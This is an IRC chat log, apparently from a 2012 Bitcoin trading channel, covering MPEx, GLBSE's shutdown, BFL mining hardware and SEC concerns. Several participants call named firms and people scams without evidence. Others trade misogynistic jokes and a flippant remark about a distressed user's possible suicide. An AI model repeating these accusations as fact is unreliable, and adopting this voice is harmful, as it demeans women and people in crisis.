hard time proving that they loaned me coins Oct 05 04:34:39 win win situation for me Oct 05 04:34:41 probably still need some kind of financial license to do that shit Oct 05 04:34:51 noagendamarket: they are registered nationally Oct 05 04:34:52 boonies4u lol Oct 05 04:35:01 where ? Oct 05 04:35:11 brazil Oct 05 04:35:38 dunno the laws in brazil :) Oct 05 04:36:00 are tghese the guys who got a letter from the brazil sec to get lost and they put a post on their blog up going "o, but we beg to differ" ? Oct 05 04:36:06 or was that some exchange thing Oct 05 04:36:08 are they bitches of the sec lol Oct 05 04:36:34 that was bitcoinrain guy Oct 05 04:36:54 google translate can't seem to work on the government listing site Oct 05 04:37:06 i'm having trouble navigating Oct 05 04:37:32 they arent allowed to run an investment in brazilian but the brazil sec doesnt care if they do it in english lol Oct 05 04:38:03 that true? Oct 05 04:38:03 you mean portuguese ? Oct 05 04:38:08 yes Oct 05 04:38:09 and he does Oct 05 04:38:13 lol Oct 05 04:38:17 nice policy. Oct 05 04:38:28 it means you won't scam as many citizens Oct 05 04:38:33 yep Oct 05 04:38:40 you can scam foreigners tho Oct 05 04:38:47 totally Oct 05 04:39:36 scamming is the national sport of bitcoin Oct 05 04:39:44 no shit Oct 05 04:39:46 https://bitcointalk.org/index.php?topic=115441.msg1245504#msg1245504 i like capitalist people like kakobrekla :D Oct 05 04:40:10 ;;bc,24hprc Oct 05 04:40:11 12.86 Oct 05 04:41:22 what a xenophobic asshole https://bitcointalk.org/index.php?topic=115441.msg1245528#msg1245528 Oct 05 04:42:03 for some reason the girl seems to be a magnet of these Oct 05 04:42:13 that bitcoin.me fellow was going on about the same stuff Oct 05 04:42:20 noagendamarket: I think I found it http://www.receita.fazenda.gov.br/pessoajuridica/cnpj/cnpjreva/cnpjreva_solicitacao.asp Oct 05 04:43:37 google translate of corporate name : Cosmic Egg DATA PROCESSING SERVICES LTD - ME Oct 05 04:44:12 CODE AND DESCRIPTION OF MAIN ECONOMIC ACTIVITY 63.11-9-00 - Data processing, service providers and application hosting services on the Internet   CODE DESCRIPTION OF ECONOMIC ACTIVITIES AND SECONDARY Unknown Oct 05 04:44:31 "Maybe not, but I wouldn't give ~400 dollars for nothing to someone who cannot pay 10 dollars for a domain; so hosts it on a subdomain of a site which hosts child prn anyway." Oct 05 04:44:34 i think azenda means firm Oct 05 04:44:40 But that's false... there is a mpex domain... Oct 05 04:44:47 You just redirect it =/ Oct 05 04:44:57 they don't handle fiat Oct 05 04:44:58 BTC-Mining false or true shouldn;'t be allowed to get in the way of a good opinion Oct 05 04:45:10 Why not put the whole MPEx directly on said domain? Oct 05 04:45:11 and there's also mpex.biz and mpoe.org and what the fuck else Oct 05 04:45:13 (btcjam that is) Oct 05 04:45:20 BTC-Mining why would i ? Oct 05 04:45:49 Because being a separate thing than your blog or porn reposityr, it should be on it's own domain? Oct 05 04:46:11 right. because some shady bs new site is very trustworthy Oct 05 04:46:12 BTC-Mining: well, not all of us are ciuciu Oct 05 04:46:22 a domain that's been on the net for >5 years and dominates google is a problem Oct 05 04:46:40 if i used the backwards logic of the forum idiots i'd be doing glbse. luckily i am not. Oct 05 04:46:40 That's like asking why google didn't redirect youtube on the google.com domain when they acquired it. Oct 05 04:46:43 and i do mean luckily. Oct 05 04:46:44 why would porn lower trust? Oct 05 04:46:54 People like to have one domain/business venture. Oct 05 04:47:00 Not all mixed on the same domain. Oct 05 04:47:02 BTC-Mining if i aquired youtube it would be on google.com/youtube Oct 05 04:47:02 Geta domain and a css designer for one :P Oct 05 04:47:06 porn is just about the most profitable internet business when done correctly Oct 05 04:47:07 much like translate is translate.google.com Oct 05 04:47:09 not translate.com Oct 05 04:47:36 Yeah but translate is a google tool, not really a full fledged venture Oct 05 04:47:36 smickles that was years ago i think. Oct 05 04:47:39 and a new PR account :P Oct 05 04:47:46 BTC-Mining according to whom or what standard set ? Oct 05 04:47:47 Also, as long as it has your gpg seal on it, any domain is trustworthy Oct 05 04:48:07 mircea_popescu: I have heard that the high dollar cam sites are still doing well Oct 05 04:48:16 BTC-Mining i must shamedly confess i haven't been using gpg for all that long. Oct 05 04:48:30 mircea_popescu: if you owned pornhub.com and bought out nickelodeon, would it be pornhub.com/nickelodeon Oct 05 04:48:31 ? Oct 05 04:48:40 bwhahaha Oct 05 04:48:45 ahahaha boonies4u Oct 05 04:48:59 boonies4u with the edge cases :D Oct 05 04:49:01 MAYBE in that case i'd keep them separate. Oct 05 04:49:06 but i must give it to you :D Oct 05 04:49:08 WTF did Nefario allow a lotto "companY' to list on glbse ? Oct 05 04:49:16 noagendamarket you tell me. Oct 05 04:49:17 Well Youtube is a business which bring money. Translate doesn't display any add or do anything other than translate. Oct 05 04:49:26 lotto ipo that kills me Oct 05 04:49:27 noagendamarket: well, he does have a black market section now Oct 05 04:49:31 BTC-Mining mpex doesn't display any ads either. Oct 05 04:49:38 nor does it do anything other than trade. Oct 05 04:49:51 Basically, if it's a tool like Google Mail, Google Translate, Google Maps or anything google, it's on google.com or a subdomain. Oct 05 04:50:07 If it's another name like Youtube or Blogger, it's on a different domain. Oct 05 04:50:11 mircea_popescu: you should put ads on mpex, promoting your porn laden yotsuba clone Oct 05 04:50:13 BTC-Mining just pointing out that this fetish with new domains is bullshit. Oct 05 04:50:21 as reprentance said, too many people think that busienss = domain + css. Oct 05 04:50:22 this is false. Oct 05 04:50:24 there's a youtube clone? Oct 05 04:50:33 smickles: YOTSUBA clone Oct 05 04:50:37 Youre not allowed to buy lotto tickest and onsell them Oct 05 04:50:40 that i'm putting a little stress on this point is a boon i am granting to the conglomerated idiots around btc, on my dimee Oct 05 04:50:45 i hope that's pretty clear now. Oct 05 04:50:47 The first are complements to google search, the others are completly separate. Oct 05 04:50:48 smickles: google yotsuba b Oct 05 04:51:12 That it be false or not, you got to please the consumer, not yourself. Oct 05 04:51:25 BTC-Mining finance is not a consumer business Oct 05 04:51:31 again, this is not tv. headcount doesn't count. Oct 05 04:51:34 [MPEX] [F.GIGA.ETF] 8300 @ 0.00039784 = 3.3021 BTC [-] Oct 05 04:51:46 people need to stop out of this facebook paradigm. Oct 05 04:51:50 facebook failed. Oct 05 04:52:00 As long as there is adequate brokers it doesnt matter Oct 05 04:52:08 just as mypsace failed before it. Oct 05 04:52:20 facebook failed? Oct 05 04:52:22 yes. Oct 05 04:52:26 The pink sheets market isnt consumer facing either Oct 05 04:52:26 how so? Oct 05 04:52:41 boonies4u what's the share price / ipo share price ? Oct 05 04:52:53 mircea_popescu: facebook as an ipo might have failed Oct 05 04:52:56 no. Oct 05 04:52:59 the business model failed. Oct 05 04:53:01 er Oct 05 04:53:06 facebook itself hasnt failed Oct 05 04:53:08 watch it be spun off for 10% of cost like myspace was, 5 years ago. Oct 05 04:53:09 facebook as an IPO DID fail Oct 05 04:53:14 yes, it has. you jusrt don't see it yet. Oct 05 04:53:19 but fb is dead, as a business. Oct 05 04:53:25 fb has no business model Oct 05 04:53:30 mircea_popescu: I never seen it as a business Oct 05 04:53:34 you cant even say its failed as a business Oct 05 04:53:37 its _not_ a business Oct 05 04:53:38 its a scam Oct 05 04:53:49 its a honeypot :P Oct 05 04:53:50 i guess i'll let mr 9/11 take over from here. Oct 05 04:54:01 they're trying to float a business model of selling users for their information to third parties, but its too little too late Oct 05 04:54:12 Diablo-D3 nobody gives a shiot about "user's information" Oct 05 04:54:19 mircea_popescu: some companies do Oct 05 04:54:22 Diablo-D3: ever heard of GOOG? Oct 05 04:54:28 who cares ? people are so self obsessed they really thing someone would pay $$$ to know what they think of a cat picture ? Oct 05 04:54:29 gtfo. Oct 05 04:54:31 dub: google has done this since day one Oct 05 04:54:38 lol Oct 05 04:54:41 mircea_popescu: no, its usually just brand research Oct 05 04:54:54 nobody cares. really. you'd have to pay companies to care about what "the userbase" does. Oct 05 04:54:59 like, if I say pepsi sucks, pepsi mightw ant to know why Oct 05 04:55:01 I love when people mistake my trolling for financial advice Oct 05 04:55:03 they pay $$ to know what cat food you buy :P Oct 05 04:55:05 Diablo-D3 it couldn't care less. Oct 05 04:55:05 problem is, facebook doesnt HAVE the why Oct 05 04:55:11 facebook isnt a blog Oct 05 04:55:17 mircea_popescu: nobody cares what you think about facebook Oct 05 04:55:18 let it go Oct 05 04:55:30 infact, Im not sure what facebook is Oct 05 04:55:44 you cant connect with friends over it, you cant tell the world what you think of it Oct 05 04:55:44 facebook IPO failed because of goldman sachs :P Oct 05 04:55:46 boonies4u i wasn't even talking about facebook ?! Oct 05 04:55:55 er, over it Oct 05 04:55:56 can we leave facebook off this chan? Oct 05 04:56:06 mircea_popescu: wait, what? Oct 05 04:56:13 LEAVE FACEBOOK ALONE Oct 05 04:56:19 ^ Oct 05 04:56:20 smickles: why? its a perfect example of how you can sell hype to idiot investors Oct 05 04:56:21 oO cool I just got an email from BFL Oct 05 04:56:26 +50% increase in performance Oct 05 04:56:30 the SC Singles are 60GH/sec now Oct 05 04:56:37 facebook should make its own stock exchange and list on itself lol Oct 05 04:56:38 Azelphur: yeah, and matching nearly identical numbers to everyone else Oct 05 04:56:39 what a scam Oct 05 04:56:39 Azelphur: /want Oct 05 04:56:44 so did I, they are shipping my asics in teh first 3rd Oct 05 04:56:45 ahahaha Azelphur is getting into last week! Oct 05 04:56:48 Diablo-D3: xD Oct 05 04:56:52 Diablo-D3: let me fetch a link Oct 05 04:56:53 mircea_popescu: :( Oct 05 04:56:59 welcome to the future man! Oct 05 04:57:01 mircea_popescu: BUT I ONLY GOT THE EMAIL TWO MINUTES AGO Oct 05 04:57:07 it's the 4th here! Oct 05 04:57:07 NO. Oct 05 04:57:09 I got two emails Oct 05 04:57:13 xD Oct 05 04:57:26 Facebook = DMC Oct 05 04:57:29 that cheers me up anyway as I have 3 singles on preorder Oct 05 04:57:31 Diablo-D3: https://bitcointalk.org/index.php?topic=114363.msg1233997 Oct 05 04:57:34 noagendamarket: troll much Oct 05 04:57:42 :P Oct 05 04:57:50 you know Oct 05 04:57:58 assbot should really be called assbook Oct 05 04:57:58 dmc is better than facebook. dmc lost investors like 10k usd off ipo prices ? Oct 05 04:58:03 facebook more like 30mn Oct 05 04:58:04 kakobrekla: make it so Oct 05 04:58:13 boonies4u: basic and reclaimer will be 4-5 watts/gh Oct 05 04:58:36 so will avalon Oct 05 04:58:46 if bfl claims anything other than that, they're lying Oct 05 04:58:49 everyone is claiming the same now, so the battle of wits is on Oct 05 04:58:52 Diablo-D3: no Oct 05 04:58:52 WHAT HAPPEN: http://snapplr.com/pddg Oct 05 04:58:57 who will claim 2watt/gh ? Oct 05 04:59:07 Diablo-D3: they're not using the same asic tech I believe Oct 05 04:59:16 bfl isnt using ANY asic tech Oct 05 04:59:17 it doesnt exist Oct 05 04:59:20 copumpkin: s/T// Oct 05 04:59:29 ? Oct 05 04:59:30 Diablo-D3: then it doesn't matter what they claim, your point is moot Oct 05 04:59:35 I have no reason to believe bfl is legit Oct 05 04:59:42 copumpkin is that doctored ? Oct 05 04:59:43 they have failed to answer vital questions Oct 05 04:59:45 i see it ~40 Oct 05 04:59:47 BFL spent all your money on hookers and blow Oct 05 04:59:51 Diablo-D3: you sound mad Oct 05 04:59:52 copumpkin: http://www.youtube.com/watch?v=D421N6xlisg Oct 05 04:59:58 they have refused to treat their investors AS investors, and keep claiming they're preorder customers Oct 05 04:59:59 mircea_popescu: nope, you might be looking at one of their indices, not the company itself Oct 05 05:00:01 actually, that could be usagi Oct 05 05:00:03 o o Oct 05 05:00:13 Diablo-D3: they are preorder customers Oct 05 05:00:21 copumpkin: did someone nuke china or something? Oct 05 05:00:24 nope, investors. Oct 05 05:00:26 ya wow 27.2 Oct 05 05:00:31 Diablo-D3: who are investors? Oct 05 05:00:31 nah Oct 05 05:00:41 you're a preorder customer if the product actually exists Oct 05 05:00:43 but vanguard dropped them as the benchmark for their funds Oct 05 05:00:47 and the thing tanked 25% Oct 05 05:00:50 I felt bad for them Oct 05 05:00:57 dude is there anyone you don't feel bad ? Oct 05 05:01:01 cobuddhakin Oct 05 05:01:04 dub: aha :) I was referring to zero wing Oct 05 05:01:07 Diablo-D3: the product was already designed IIRC befoe they were put out for preorder Oct 05 05:01:07 mircea_popescu: lol Oct 05 05:01:12 I like feeling bad Oct 05 05:01:13 boonies4u: nope Oct 05 05:01:18 such a brit. Oct 05 05:01:18 boonies4u: it wasnt even taped out Oct 05 05:01:24 Diablo-D3: source? Oct 05 05:01:32 source? common sense. Oct 05 05:01:44 Diablo-D3: i'm sorry,I don't take that here Oct 05 05:01:46 BFL has refused to answer any questions to hide this fact Oct 05 05:01:56 boonies4u: I could care less what you think Oct 05 05:01:57 Diablo-D3: have you submitted it in writing? Oct 05 05:02:11 common sense is usually incorrect Oct 05 05:02:22 mircea_popescu: quite. Oct 05 05:02:25 I know how chip manufacturing works, BFL has refused to answer even basic questions about their operation Oct 05 05:02:32 there is no reason to think the chips exist Oct 05 05:02:35 period Oct 05 05:02:46 Diablo-D3 just cause they won't answer q's ? Oct 05 05:02:52 i wouldn't answer q's in their position. Oct 05 05:03:06 and myself as tits Oct 05 05:03:06 Diablo-D3: then it doesn't matter how they treat the people they're scamming Oct 05 05:03:10 I'm actually english Oct 05 05:03:10 mircea_popescu: they'd have to answer to investors and they refuse to Oct 05 05:03:21 why would they have to ? Oct 05 05:03:27 and iirc they're not listed anywhere, what investod Oct 05 05:03:29 rs* Oct 05 05:03:45 the people they keep trying to claim are preorder customers arent Oct 05 05:03:45 Diablo-D3: first, you accuse them for lying that they have less power consumption than everyone else, then you say they're lying for not having chips at all Oct 05 05:03:49 smickles: and I am quite cross at the recent developments with glbse Oct 05 05:03:51 they're investors Oct 05 05:04:04 copumpkin: in the whitest kids youknow racewar skit, english is 'merican Oct 05 05:04:11 boonies4u: theres no way thats happening unless they're on 45nm Oct 05 05:04:19 and they're not on 45nm Oct 05 05:04:39 prolly was ritalianian Oct 05 05:04:43 Diablo-D3: so are they scammers because there's no chips? or are they scammers because there are no 45nm chips? Oct 05 05:04:43 now, it could be a sasic 45nm, but then you're basic to having a shit inefficient design not much better than a 45nm fpga Oct 05 05:04:46 make up your fucking mind Oct 05 05:04:55 boonies4u: they're scammers because their chips cant exist. Oct 05 05:05:14 the little information they did release only highlights how much of a scam it is Oct 05 05:05:23 honestly i find the entire asic thing dubious. not just bfls', across the board. Oct 05 05:05:25 :O Oct 05 05:05:42 mircea_popescu: dedicated mining hardware is inevitable Oct 05 05:05:42 !ticker asicmining Oct 05 05:05:43 mircea_popescu: it'd be funny if it was a circle of lies of everyone one-upping the others' lies Oct 05 05:05:44 Invalid ticker. Oct 05 05:05:49 and nobody has a clue how it works Oct 05 05:05:49 figures Oct 05 05:05:52 boonies4u: usually if someone claims to have defeated the laws of physics, its a scam Oct 05 05:05:58 dub: you were the one mocking nefario for needing 400 quid, right? Oct 05 05:06:01 copumpkin it's what i suspekt. Oct 05 05:06:02 Diablo-D3: usually Oct 05 05:06:10 boonies4u inevitable, yes. 2012, no. Oct 05 05:06:11 oh lol Oct 05 05:06:20 copumpkin: correct Oct 05 05:06:24 the people claiming them cavalierly have neither the expertise nor the capital to bring them. Oct 05 05:06:31 glbse shut down b/c nef didn't pay the hosting bill b/c noone lent him the money Oct 05 05:06:37 safra scottjp sgnb sgornick singular- smickles Smoovious SomeoneWeird sulphair SuprTiggr Oct 05 05:06:38 mircea_popescu: basically yes Oct 05 05:06:40 smickles noway ? Oct 05 05:06:41 lol Oct 05 05:06:51 friedcat did it by cheating Oct 05 05:06:53 smickles: he probably didn't try hard enough Oct 05 05:06:54 ;) Oct 05 05:06:56 so hes probably the only legitimate one Oct 05 05:07:31 although it was timed consistant with the nature of name server switching Oct 05 05:07:34 130nm 200mm wafers at SMIC using SMIC's IP core library to spam a predesigned sha256 core Oct 05 05:07:51 quick and ugly Oct 05 05:08:11 copumpkin: I haven't been paying attention, was there a punchline? Oct 05 05:08:15 smickles may not be too far from the truth Oct 05 05:08:25 dub: oh, it'd be funny if he shut down glbse cause he was out of money :P Oct 05 05:08:28 that was it Oct 05 05:08:37 doesn't he have goat's dough tho ? Oct 05 05:08:39 MY PENIS IS BIGGER THAN AN AIRCRAFT CARRIER MOTHERFUCKAAAAAS Oct 05 05:08:45 or was that what the drama there was all about Oct 05 05:08:54 lol smickles is drunk. Oct 05 05:09:21 glbse is offline, what else is there. I'm not taking usagi's route Oct 05 05:09:43 lol what's that ? Oct 05 05:10:14 whats usagi done now ? Oct 05 05:10:18 worst case senario, (oh usagi didn't kill himself yet?) I go to jail for lame ass securities fraud. Oct 05 05:10:30 no Oct 05 05:10:34 smickles dude gtfo already. Oct 05 05:11:18 brb, in urgent need of olives Oct 05 05:11:21 ah, ok. But srsly about usagi, is anyone able to check on him? he was spouting off all depressed earlier Oct 05 05:11:28 I tried Oct 05 05:11:29 securities fraud my ass Oct 05 05:11:35 smickles: I hope he's okay Oct 05 05:11:40 sounded a little extreme Oct 05 05:11:43 they msgd me back saying they were done puking Oct 05 05:11:45 actually im agreeing with copumpkin for once. poor dood. Oct 05 05:11:47 mircea_popescu: yeah, b/c of the way the regs are in 'merica Oct 05 05:11:51 then I said well there is always dry heaving Oct 05 05:11:57 no response after that Oct 05 05:12:03 smickles want me to bet you 1:1 that you're not going to no jale ? Oct 05 05:12:10 as if usagi even exists Oct 05 05:12:11 I didn't file regulation D exemption for S2cm or MPOE.etf Oct 05 05:12:16 its someones troll account Oct 05 05:12:20 oooouuuuuhhh Oct 05 05:12:20 probably MNW Oct 05 05:12:29 what do you want smickles ? .1 btc ? 1 btc ? 10 ? 100 ? Oct 05 05:12:32 usagi: come back, we all love you Oct 05 05:12:39 usagi =diablod3 lol Oct 05 05:12:43 mircea_popescu: 1:1, naw, i don't give my self that good of odds going to jail Oct 05 05:13:02 smickles: pics or it didnt happen :P Oct 05 05:13:05 I seriously don't expect to go to jail Oct 05 05:13:06 lol what odds you give yourself ? Oct 05 05:13:10 a ok. Oct 05 05:13:20 my easy money ideea ;/ look what they did to it@ Oct 05 05:13:25 *hides in the ecuadorian embassy Oct 05 05:13:36 but just in case i do. You all know this: Oct 05 05:13:36 just tell the SEC we all got carried away thats all Oct 05 05:13:40 fuck 'merica Oct 05 05:13:48 and that damn french statue Oct 05 05:13:51 agreed Oct 05 05:13:59 you all should move somewhere nice Oct 05 05:14:01 like iran. Oct 05 05:14:16 I like the beaches here Oct 05 05:14:17 I hear it's beautiful there Oct 05 05:14:34 Ill move to new zealand they hate the US too lol Oct 05 05:14:38 copumpkin yeah, and loads of old stuff to check out Oct 05 05:14:46 I love old stuff Oct 05 05:14:49 and if i have to testify somewhere and the grand inquisitor askes me about that statement: Oct 05 05:15:01 smickles: link to the apeshit vide Oct 05 05:15:03 video Oct 05 05:15:05 The uS tried sending a nuclear warship to NZ they told them to gtfo Oct 05 05:15:20 smickles: this one: http://www.youtube.com/watch?v=9jOwvrRuUC4 Oct 05 05:15:34 I'd point out that I said that statement in preparation for just this situation Oct 05 05:15:37 noagendamarket: thats redundant Oct 05 05:15:40 just say warship Oct 05 05:15:44 How am I supposed to do that? There's no f*****g volume, there's no buyer except at 0.000000001 BTC because of all the shit. Why somebody whould buy an asset when you have the choice between: Oct 05 05:15:44 -A website that make instant decisions without any warning (delisting, closing, whatever) Oct 05 05:15:44 -Another who ask 350$ for registration with more porn than assets on it. Oct 05 05:15:54 y people do not understand the importance of paying me fees :( Oct 05 05:16:26 smickles: make sure the SEC sees the whole thing, as it contains crucial evidence for the case Oct 05 05:16:46 [MPEX] [S.MPOE] 34700 @ 0.00036386 = 12.6259 BTC [+] Oct 05 05:16:55 lol Oct 05 05:17:31 copumpkin: <3 Oct 05 05:18:04 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.2221539 = 222.1539 BTC [+] Oct 05 05:18:21 [MPEX] [O.BTCUSD.C110T] 700 @ 0.27527009 = 192.6891 BTC [+] Oct 05 05:18:32 [MPEX] [O.BTCUSD.C130T] 700 @ 0.17827185 = 124.7903 BTC [+] Oct 05 05:18:39 what a bizzare strat. Oct 05 05:18:44 ya know, at least us humans genearlly eat shit in a figurative sense Oct 05 05:19:29 Smoovious: didn't something like 500 btc just trade there? Oct 05 05:20:16 ok, i am drunk, that question just derpped me Oct 05 05:21:08 did you have the same suspision about glbse, icbit, or cbx? Oct 05 05:21:33 Smoovious is teh great conspiracy theorist Oct 05 05:21:51 why is that the case? Oct 05 05:21:55 and general whiteknighter for usagio Oct 05 05:22:08 pfft? Oct 05 05:22:22 everything is a scam except usagio Oct 05 05:22:23 this "if bitcoins are hoarded they're worthless" argument is utterly bs. Oct 05 05:22:23 i may be drunk, but pfft isn't a good reason Oct 05 05:22:31 things that people WANT have value. Oct 05 05:22:39 they don't have to be traded to have value, they just need to be wanted. Oct 05 05:23:14 actually, virgins are in most times and places more valuable than well used whores. i wonder why. Oct 05 05:23:39 [MPEX] [F.GIGA.ETF] 600 @ 0.00039781 = 0.2387 BTC [-] Oct 05 05:23:40 [MPEX] [F.GIGA.ETF] 9800 @ 0.00039715 = 3.8921 BTC [-] Oct 05 05:23:42 [MPEX] [F.GIGA.ETF] 7900 @ 0.0003839 = 3.0328 BTC [-] Oct 05 05:23:43 [MPEX] [F.GIGA.ETF] 7500 @ 0.00035145 = 2.6359 BTC [-] Oct 05 05:23:44 [MPEX] [F.GIGA.ETF] 1 @ 0.00018002 BTC [-] Oct 05 05:23:45 [MPEX] [F.GIGA.ETF] 1000 @ 0.00018002 = 0.18 BTC [-] Oct 05 05:23:46 [MPEX] [F.GIGA.ETF] 1000 @ 0.00018001 = 0.18 BTC [-] Oct 05 05:23:48 [MPEX] [F.GIGA.ETF] 199 @ 0.00018 = 0.0358 BTC [-] Oct 05 05:23:55 wtf, giga went back up to .004ish? Oct 05 05:24:14 er, add a 0 inthere Oct 05 05:24:14 apparently were bids Oct 05 05:25:22 it seems to me people argue both sides of an argument far too often Oct 05 05:25:36 *far to often to be intentional Oct 05 05:25:46 *intentionally doing so Oct 05 05:26:04 *because this needed one more asterisk Oct 05 05:26:05 the one thing i love about running mpex is how rarely i need to pay tx fees Oct 05 05:26:10 sitting on coins rules. Oct 05 05:27:24 mircea_popescu: i bet I could run up your tx fees by like .0001 or so :P Oct 05 05:27:53 how ? Oct 05 05:31:31 https://bitcointalk.org/index.php?topic=115507.msg1246125#msg1246125 wow check out this totally awesome idea Oct 05 05:31:57 is it hunting nefario down and cutting his tits off? Oct 05 05:32:10 or are we not quite there yet Oct 05 05:32:46 depends when saturday is Oct 05 05:33:12 lol Oct 05 05:35:34 smickles, yes, sadly Oct 05 05:35:44 i love it when people post ambiguous dates Oct 05 05:35:46 so much fun Oct 05 05:35:49 Almost on par even if it won't upgrade Oct 05 05:40:04 ;;ticker Oct 05 05:40:04 Best bid: 12.73, Best ask: 12.83, Bid-ask spread: 0.10000, Last trade: 12.83, 24 hour volume: 40200, 24 hour low: 12.6, 24 hour high: 13.0899 Oct 05 05:43:19 Success and Enjoy! Oct 05 05:43:22 new forum sig Oct 05 05:43:36 >implying I have a forum acct Oct 05 05:44:06 i must say, cryptostocks site is about 100 times better than glbse ever was Oct 05 05:44:09 loads reasonably, etc. Oct 05 05:45:10 is the owner on irc even ? Oct 05 05:48:29 !ticker asicminer Oct 05 05:48:31 Invalid ticker. Oct 05 05:48:35 ow Oct 05 05:48:58 [MPEX] [S.MPOE] 16000 @ 0.00036386 = 5.8218 BTC [+] Oct 05 05:57:05 [MPEX] [S.DICE] 2000 @ 0.00339997 = 6.7999 BTC [-] Oct 05 05:57:06 [MPEX] [S.DICE] 8000 @ 0.00339998 = 27.1998 BTC [+] Oct 05 06:05:28 wowzer Oct 05 06:05:33 waht a netsplit Oct 05 06:06:08 ;;ident Oct 05 06:06:08 You are not identified. Oct 05 06:07:21 ).(\ Oct 05 06:14:45 eventually any bitcoin site offering securities will run into exactly the same issues glbse has Oct 05 06:15:34 best bet : get your local stock broker to accept btc lol Oct 05 06:18:31 what issues? Oct 05 06:18:49 noagendamarket wanna bet ? Oct 05 06:19:16 was there some more info? Oct 05 06:21:11 mircea_popescu, can you at least demand from your MPOE-PR to get her facts straight? Although she has many valid claims/points, she keeps attacking everything with misquotes/altered facts which are easy to point out. It's like a double edged sword. Oct 05 06:21:27 specifically ?! Oct 05 06:22:00 Arf, okay, let me check her post history and find back a few. Oct 05 06:22:08 [MPEX] [S.MPOE] 1457 @ 0.00035988 = 0.5243 BTC [-] Oct 05 06:22:59 http://www.downforeveryoneorjustme.com/bitcointalk.org :( Oct 05 06:23:22 ya its dead for me too. Oct 05 06:23:30 B0g4r7 you bogart on forum btw ? Oct 05 06:23:31 yes, internet is 50% less retarded for the moment Oct 05 06:23:35 gaah Oct 05 06:23:38 yea Oct 05 06:23:38 dub 66% Oct 05 06:23:47 damn... Oct 05 06:23:49 welcome to irc :p Oct 05 06:23:55 and its back :( Oct 05 06:24:12 ;;ident B0g4r7 Oct 05 06:24:12 Nick 'B0g4r7', with hostmask 'B0g4r7!natty@h-98-134-238-48.ip.alltel.net', is not identified. Oct 05 06:24:19 ;;getrating B0g4r7 Oct 05 06:24:19 This user has not yet been rated. WARNING: Currently not authenticated. Oct 05 06:24:28 a, make one sometime. Oct 05 06:24:57 hm, yea I never did figure out the web-of-trust or whatever that system is. Oct 05 06:25:14 B0g4r7 do you have a gpg signature yet ? Oct 05 06:25:31 Neg. Oct 05 06:25:34 Guess I should. Oct 05 06:25:43 yea, you should. Oct 05 06:25:55 it's one of the things that seem stupid before you get it and impossible to live w/o after. Oct 05 06:26:05 Okay, so for example, she start a scammer tag thread for nefario. Stating how it's been mismanaged. That's okay until now. I'd agree the situations have been mismanaged. Oct 05 06:26:27 Looks like I missed out on today's drama, being away from my deskjob desk. Oct 05 06:26:34 But about DMC, she states: I.d. The accounts were later unblocked without any audit being performed, and without any material changes in the alleged facts. Oct 05 06:26:40 aha ? Oct 05 06:26:59 When the shareholders decided by a motion to keep Diablo-D3 as a manager. Also. Oct 05 06:27:14 III.a. Starting at least as early as September 10 the assets controlled by Usagi (CPA, NYAN.x, BMF) were being scrutinized publicly on this forum for gross negligence possibly amounting to fraud on the part of the asset holder, in the same manner and to an extent equal or greater to that of I.a. above. Oct 05 06:27:14 III.b. In spite of III.a. Nefario declared Usagi as the head of the ad-hoc commission that was to review GLBSE assets for inclusion in blue/white categories. Oct 05 06:27:37 Someone should just make a less retarded version of MPEX with exactly the same features lol Oct 05 06:27:42 Usagi was never declared head of a commission or appointed to review and make decisions about asset inclusion. Oct 05 06:27:44 win Oct 05 06:28:03 that would be hilarious Oct 05 06:28:18 I'm also in the group with Usagi. We're merely providing input and opinion but have no actual say in decisions which are left to Nefario Oct 05 06:28:42 She twists facts/improperly research them Oct 05 06:28:52 BTC-Mining well, so you're in a better position than her to know. you should make a post saying this right there Oct 05 06:28:55 that way people know. Oct 05 06:29:10 everyone wins. Oct 05 06:29:13 The problem is Nefario takes more notice of the people on this "board" than people whio actually own the company.... Oct 05 06:29:23 She gives half stories keeping only parts to make it look worse, and people spot it. Makes MPOE-PR look bad and thus MPEx Oct 05 06:29:34 https://bitcointalk.org/index.php?topic=115430.msg1245220#msg1245220 Oct 05 06:29:35 "feel sorry for anyone who didn't pull out after learning that the SEC guy knew something would be happening with GLBSE." Oct 05 06:29:35 ^ what is this referring to? Oct 05 06:29:36 BTC-Mining why do you think it's deliberate ? Oct 05 06:29:53 B0g4r7 not too clear. Oct 05 06:29:57 I'll reply soon to the thread, I just mean, ask her to research the facts a thoroughly. Oct 05 06:30:40 It might not be deliberate, but it's bad PR if the facts she gives are not accurate, especially when making serious accusations. Oct 05 06:30:42 mircea_popescu: B0g4r7 .... the "SEC Guy" thing is in reference to an email recieved by some from SEC i am pretty sure Oct 05 06:31:11 BTC-Mining how'd she research things that are privy to like a few people ? was what you claim now posted anywhere ? Oct 05 06:31:14 Any forum (or other) reference you can cite? Oct 05 06:31:16 these aren't "facts". Oct 05 06:31:50 B0g4r7: was that directed at me ? Oct 05 06:31:56 yeah Oct 05 06:31:58 B0g4r7 there's a pastebin, want me to dig it out for you ? Oct 05 06:32:00 B0g4r7: i have a copy of the email but not sure if its kosher to pass it around .... Oct 05 06:32:11 ^^ or mircea_popescu can find the pastie Oct 05 06:32:12 MrTiggr by now it;s in the open, go ahead Oct 05 06:32:14 mircea_popescu: if you would plz. Oct 05 06:32:15 if you have it handy Oct 05 06:32:35 ill grab it Oct 05 06:32:45 I think the SEC is just trolling Oct 05 06:32:57 looked TOTALLY legit, noagendamarket Oct 05 06:33:11 Shake the trees and see if cocnuts fall out Oct 05 06:33:11 it was legit. they prolly got 1000 complaints forwarded from local da's and whatnot Oct 05 06:33:12 all the headers checked out and even a phone call was made to check it i believe Oct 05 06:33:16 and well... they gotta do something Oct 05 06:33:55 they could start with goldman sachs Oct 05 06:34:12 mircea_popescu, as far as I'm aware, no, but neither was the fact Usagi somehow had any say about assets listing or not. Oct 05 06:34:13 noagendamarket no, those have monyz Oct 05 06:34:36 BTC-Mining im not even sure where she picked that up, but prolly in one of the many usagi drama threads Oct 05 06:34:49 https://bitcointalk.org/index.php?topic=114442.msg1246559#msg1246559 Oct 05 06:34:49 Like I posted here, I wonder if the LOTTOMINING thing was an SEC sting. Oct 05 06:35:00 People are seriously starting to form a bad opinion of MPOE=PR and indirectly, MPEx because she make up facts/guesstimate them without verifying them. Oct 05 06:35:02 B0g4r7 im pretty sure it was just pure retardedness. Oct 05 06:35:18 The timing would fit. Oct 05 06:35:23 BTC-Mining you know she has a pretty good record of being spot on, right ? Oct 05 06:35:32 And it seems quite blatant in its illegality. Oct 05 06:35:37 (LOTTOMINING) Oct 05 06:36:03 LOTTOMINING brought to you by BFL Oct 05 06:36:08 B0g4r7 its funny cause of the yeah Oct 05 06:36:14 of the bfl connection Oct 05 06:36:23 Yeah, I 